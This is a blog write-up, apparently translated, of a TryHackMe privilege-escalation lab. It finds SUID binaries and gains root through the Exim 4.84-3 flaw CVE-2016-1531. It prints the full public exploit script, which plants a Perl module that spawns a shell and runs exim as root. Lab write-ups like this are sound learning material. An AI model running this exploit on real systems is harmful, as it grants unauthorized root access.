![[CVE-2016-1531] We tried to escalate privileges using the vulnerability in Exim 4.84.3. TryHackMe Linux PrivEsc Writeup Part 6](https://hack-lab-256.com/wp-content/uploads/2023/04/hack-lab-256-samnail-12.jpg)
This time, we will try "CVE-2016-1531 Elevation of privileges using the vulnerability in Exim 484.3."
The target machine uses the Room below of TryHackMe.
"TryHackMe-Linux PrivEsc: https://tryhackme.com/room/linuxprivesc "
This article is part 6.
If you would like to check Writeup for Linux PrivEsc with TryHackMe, please also check Privilege Elevation Using Cron Jobs
Pochip
Pochip
Pochip
Pochip
Preparation
First, start the target machine.
If you are using TryHackMe, select "Start Machine."
If the IP Address is displayed as shown below, you can start it!
This time, the privilege escalation will occur after you have been able to connect to the target machine, so check to the point where you can connect via SSH.
┌──(hacklab㉿hacklab)-[~] └─$ ssh user@10.10.52.40 user@10.10.52.40's password: Linux debian 2.6.32-5-amd64 #1 SMP Tue May 13 16:34:35 UTC 2014 x86_64 The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. Last login: Sun Apr 9 08:54:59 2023 from ip-10-18-110-90.eu-west-1.compute.internal user@debian:~$Once you have access, advance preparation is complete.
CVE-2016-1531 Privilege Elevation Using Vulnerability in Exim 484.3
Once you've come this far, try actually elevating your privileges.
What is SUID/SGID?
CVE-2016-1531 uses the SUID/SGID mechanism.
First, let's briefly understand SUIDs and SGIDs.
- UID: In Linux, users are managed by an ID number called a UID.
- SUID: If you have execution permission, when a file is executed, it will be executed with the owner's permissions.
- SGID: If you have execution permission, when a file is executed, it will be executed with the permissions of the group owned by the file.
Find vulnerabilities
So let's start by looking for vulnerabilities.
We'll look for a SUID/SGID executable.
user@debian:~$ find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null -rwxr-sr-x 1 root shadow 19528 Feb 15 2011 /usr/bin/expiry -rwxr-sr-x 1 root ssh 108600 Apr 2 2014 /usr/bin/ssh-agent -rwsr-xr-x 1 root root 37552 Feb 15 2011 /usr/bin/chsh -rwsr-xr-x 2 root root 168136 Jan 5 2016 /usr/bin/sudo -rwxr-sr-x 1 root tty 11000 Jun 17 2010 /usr/bin/bsd-write -rwxr-sr-x 1 root crontab 35040 Dec 18 2010 /usr/bin/crontab -rwsr-xr-x 1 root root 32808 Feb 15 2011 /usr/bin/newgrp -rwsr-xr-x 2 root root 168136 Jan 5 2016 /usr/bin/sudoedit -rwxr-sr-x 1 root shadow 56976 Feb 15 2011 /usr/bin/chage -rwsr-xr-x 1 root root 43280 Feb 15 2011 /usr/bin/passwd -rwsr-xr-x 1 root root 60208 Feb 15 2011 /usr/bin/gpasswd -rwsr-xr-x 1 root root 39856 Feb 15 2011 /usr/bin/chfn -rwxr-sr-x 1 root tty 12000 Jan 25 2011 /usr/bin/wall -rwsr-sr-x 1 root staff 9861 May 14 2017 /usr/local/bin/suid-so -rwsr-sr-x 1 root staff 6883 May 14 2017 /usr/local/bin/suid-env -rwsr-sr-x 1 root staff 6899 May 14 2017 /usr/local/bin/suid-env2 -rwsr-xr-x 1 root root 963691 May 13 2017 /usr/sbin/exim-4.84-3 -rwsr-xr-x 1 root root 6776 Dec 19 2010 /usr/lib/eject/dmcrypt-get-device -rwsr-xr-x 1 root root 212128 Apr 2 2014 /usr/lib/openssh/ssh-keysign -rwsr-xr-x 1 root root 10592 Feb 15 2016 /usr/lib/pt_chown -rwsr-xr-x 1 root root 36640 Oct 14 2010 /bin/ping6 -rwsr-xr-x 1 root root 34248 Oct 14 2010 /bin/ping -rwsr-xr-x 1 root root 78616 Jan 25 2011 /bin/mount -rwsr-xr-x 1 root root 34024 Feb 15 2011 /bin/su -rwsr-xr-x 1 root root 53648 Jan 25 2011 /bin/umount -rwxr-sr-x 1 root shadow 31864 Oct 17 2011 /sbin/unix_chkpwd -rwsr-xr-x 1 root root 94992 Dec 13 2014 /sbin/mount.nfsDon't miss "/usr/sbin/exim-4.84-3" in the list of files that can be executable with SUID/SGID.
Next, check the "exim-4.48-3" vulnerability in Exploit-DB
I think we've found out that "cve-2016-1531" will be a hit on Exploit-DB.
Once you've come this far, all you have to do is run the shell listed in Exploit-DB.
CVE-2016-1531 Elevation of privilege using Exim 484.3
Now let's create the shell listed in Exploit-DB on the target machine.
For TryHackMe, it has already been created below.
user@debian:~$ cat /home/user/tools/suid/exim/cve-2016-1531.sh #!/bin/sh # CVE-2016-1531 exim <= 4.84-3 local root exploit # ==== # you can write files as root or force a perl module to # load by manipulating the perl environment and running # exim with the "perl_startup" arguement -ps. # # eg # [fantastic@localhost tmp]$ ./cve-2016-1531.sh # [ CVE-2016-1531 local root exploit # sh-4.3# id # uid=0(root) gid=1000(fantastic) groups=1000(fantastic) # # -- Hacker Fantastic echo [ CVE-2016-1531 local root exploit cat > /tmp/root.pm << EOF package root; use strict; use warnings; system("/bin/sh"); EOF PERL5LIB=/tmp PERL5OPT=-Mroot /usr/exim/bin/exim -psFinally, just run the shell you created.
user@debian:~$ /home/user/tools/suid/exim/cve-2016-1531.sh [ CVE-2016-1531 local root exploit sh-4.1# whoami rootI was able to successfully obtain root privileges.
summary
This time, we tried "CVE-2016-1531 Elevation of privileges using the vulnerability in Exim 484.3."
Once you've done the reconnaissance, you just have to execute the contents mentioned in Exploit-DB, so it was easy.
That said, you'll notice when you're actually scouting. . . I felt that there was still more to learn.
References and Sites
--
![[HackTheBox] What to do if "An error of type HTTPClient::ReceiveTimeoutError happened, message is executed expired" appears in Evil-WinRM](https://hack-lab-256.com/wp-content/uploads/2023/09/hack-lab-256-samnail-4-300x169.jpg)
![[CVE-2015-3306] I enumerated the shared Samba, manipulate a vulnerable version of proftpd, and escalated privileges by manipulating path variables! TryHackMe Kenobi Writeup](https://hack-lab-256.com/wp-content/uploads/2023/08/hack-lab-256-samnail-2-300x169.jpg)
![[Permanent CTF for beginners] setodaNote CTF WEB Writeup! Recommended for getting a sense of CTF!](https://hack-lab-256.com/wp-content/uploads/2023/08/hack-lab-256-samnail-1-1-300x169.jpg)
![[TryHackMe] We conducted packet analysis using wireshark to investigate the intrusion of ssh-backdoor! Overpass2 Writeup](https://hack-lab-256.com/wp-content/uploads/2023/08/hack-lab-256-samnail-300x169.jpg)
![[CVE-2018-16763] fuel CMS 1.4.1 - I converted Remote Code Execution (1) to python 3 and hacked it! TryHackMe Ignite Writeup](https://hack-lab-256.com/wp-content/uploads/2023/08/hack-lab-256-samnail-25-300x169.jpg)
![[TryHackMe] I used SSH2John to extract the hash from the private key and hacked the password with John the Ripper! Overpass Writeup](https://hack-lab-256.com/wp-content/uploads/2023/07/hack-lab-256-samnail-24-300x169.jpg)
![[TryHackMe] I tried infiltrating a Windows machine with a ret2esp attack (Buffer Overflow)! Brainstorm Writeup](https://hack-lab-256.com/wp-content/uploads/2023/06/hack-lab-256-samnail-23-300x169.jpg)